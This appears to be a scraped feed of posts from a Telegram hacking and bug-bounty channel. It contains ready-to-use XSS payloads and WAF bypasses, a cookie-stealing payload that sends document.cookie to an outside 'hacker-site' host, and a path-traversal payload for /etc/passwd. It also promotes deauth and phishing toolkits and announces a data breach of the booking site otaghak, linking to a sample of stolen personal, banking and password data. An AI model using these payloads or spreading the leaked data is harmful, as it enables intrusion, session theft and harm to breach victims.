Payload XSS:
<IFRAME SRC="javanoscript:prompt(document.cookie);"></iframe>
#Payload #XSS
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Discovered an XSS vulnerability but Imperva WAF blocked it?
Try this XSS payload to bypass Imperva's protection.
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=alert(origin)>
#BugBounty #Bypass_Imperva #Payload #XSS
📢 The otaghak was hacked by irLeaks!
In short, we have the following:
- reservation information; including name and surname, reservation date, length of stay, payment fee, national code, contact number, email, etc.
- settlement information; including the amount, bank information, description, date
- messages and chats; including activation code or password, support messages and...
- Information including username, password, first and last name, gender, contact number, national code, IP address, user agent, etc.
- Payment information including payment description, payment date, amount, payer information
- detailed information of bookable places; including exact address, longitude and latitude, city, zip code, etc.
- User search information including city, province, search filters, search time frame, amount, user ID, IP address, etc.
- Bank information including name and surname of the account holder, user name, Shaba number, bank name, card number
- Discount coupons and other general information
⬇️ Sample:
https://mega.nz/file/SFskzKBR#jmEvTv8RiAQqdeanoDbVisAgzgKyuDEA-eUxIES8ebU
#NEWS #Notifaction #irleaks #otaghak
WiFi Penetration Testing & Auditing Tool
Freeway is a Python scapy-based tool for WiFi penetration testing that aims to help ethical hackers and pentesters develop their skills and knowledge in auditing and securing home or enterprise networks.
PIP:
sudo pip install 3way
Manually:
cd Freeway
sudo pip install .
#1 sudo Freeway
#2 sudo Freeway -i wlan2 -a monitor -p 1,2,a
#3 sudo Freeway -i wlan2 -a deauth
#Python #Wifi #Pentesting
Tips for XSS Bypass:
https://sub.target.com --> 403 (Forbidden)
https://sub.target.com/%3f/ --> 200 (OK)
Dork for the vulnerable parameters:
`site:*.target.com inurl:"?name="` and `site:*.target.com inurl:"?type="`
#BugBounty #Tips #XSS
Subzy
💬 Subdomain takeover tool which works based on matching response fingerprints from can-i-take-over-xyz
Installation:
go install -v github.com/LukaSikic/subzy@latest
📊 Options:
Only required flag for run subcommand (r short version) is either --target or --targets
⚪️ --target (string) - Set single or multiple (comma separated) target subdomain/s
⚪️ --targets (string) - File name/path to list of subdomains
⚪️ --concurrency (integer) - Number of concurrent checks (default 10)
⚪️ --hide_fails (boolean) - Hide failed checks and invulnerable subdomains (default false)
⚪️ --https (boolean) - Use HTTPS by default if protocol not defined on targeted subdomain (default false)
⚪️ --timeout (integer) - HTTP request timeout in seconds (default 10)
⚪️ --verify_ssl (boolean) - If set to true, it won't check site with invalid SSL
💻 Usage:
Target subdomain can have protocol defined, if not http:// will be used by default if --https not specifically set to true.
⚪️ List of subdomains:
./subzy run --targets list.txt
⚪️ Single or multiple targets:
./subzy run --target test.google.com
./subzy run --target test.google.com,https://test.yahoo.com
#BugBounty #Cybersecurity #Subdomain #Takeover
🖤
#Notifaction
Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
Exploit Author: Ex3ptionaL
Exploit Date: 2024-04-01
Vendor: https://www.eset.com
Version: 17.0.16.0
Tested on OS: Microsoft Windows 10 pro x64
#Exploit #ESET #NOD32
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LernExploit
📣 T.me/A3l3_KA4
WAF Fortinet FortiGate XSS Bypass
Payload:
<details open ontoggle="(()=>alert`ibrahimxss`)()"></details>
#XSS #WAF #Payload
Change IP Address Every 3 Seconds
#Tor #Net #IP
DARKARMY is a collection of penetration testing tools; you will have every script that a hacker needs
👤 Information Gathering:
⚪️ Nmap
⚪️ Setoolkit
⚪️ Port Scanning
⚪️ Host to IP
⚪️ Wordpress User
⚪️ CMS Scanner
⚪️ XSStrike
⚪️ Dork - Google Dorks Passive Vulnerability Auditor
⚪️ Scan A server's Users
⚪️ Crips
🔓 Password Attacks:
⚪️ CUpp
⚪️ Ncrack
🛜 Wireless Testing:
⚪️ reaver
⚪️ pixiewps
⚪️ Fluxion
🌍 Exploitation Tools:
⚪️ ATSCAN
⚪️ sqlmap
⚪️ Shellnoob
⚪️ commix
⚪️ FTP auto Bypass
⚪️ jboss-autopwn
📂 Social Engineering:
⚪️ Setoolkit
⚪️ SSLtrip
⚪️ pyPHISHER
⚪️ ZPHISHER
🧑💻 Web Hacking:
⚪️ Drupal Hacking
⚪️ Inurlbr
⚪️ Wordpress & Joomla Scanner
⚪️ Gravity Form Scanner
⚪️ File Upload Checker
⚪️ Wordpress Exploit & Plugins Scanner
⚪️ Shell and Directory Finder
⚪️ Joomla! 1.5 - 3.4.5 remote code execution
⚪️ Vbulletin 5.X remote code execution
⚪️ BruteX - Automatically brute force all services running on a target
⚪️ Arachni - Web Application Security Scanner Framework
And ...
🔼 Installation:
This Tool Must Run As ROOT !!!
cd DARKARMY
chmod +x install.sh
./install.sh
That's it. You can execute the tool by typing DARKARMY
You can also use this tool inside Termux on a phone
#Hacking #Tools #Pack #Penetration
Reflected XSS may lead to ATO
Payload:
"><noscript>alert(document.cookie)</noscript>
Simple Tip:
cat parameters.txt | grep ".php?" > php-params.txt
Test php-params.txt for: sqli, xss, html injection...etc
Attacking Cookies:
https://sub.target.com/en/test.php?vuln-param="><noscript>document.write('<img src="https://hacker-site/thing/?c='%2bdocument.cookie%2b'" />');</noscript
#BugBounty #Tips
Udemy - Bug Bounty Hunting Guide to an Advanced Earning Method
#BugBounty #Course #Udemy
Payload:
site.tld/xyz/xyz/xyz/?path=../../../../../../../../../etc/passwd
#BugBounty #Tips
Bypass dot (.) block in XSS
❌ alert(document.cookie)
✅ alert(cookie)
Sometimes 'cookie' is a variable declared as 'document.cookie'
#XSS #BugBounty #Tips
WAF blocks any "</"
Try HTML injection
</a> worked...
Payload:
</a<noscript>alert(document.cookie</noscript>
#BugBounty #Tips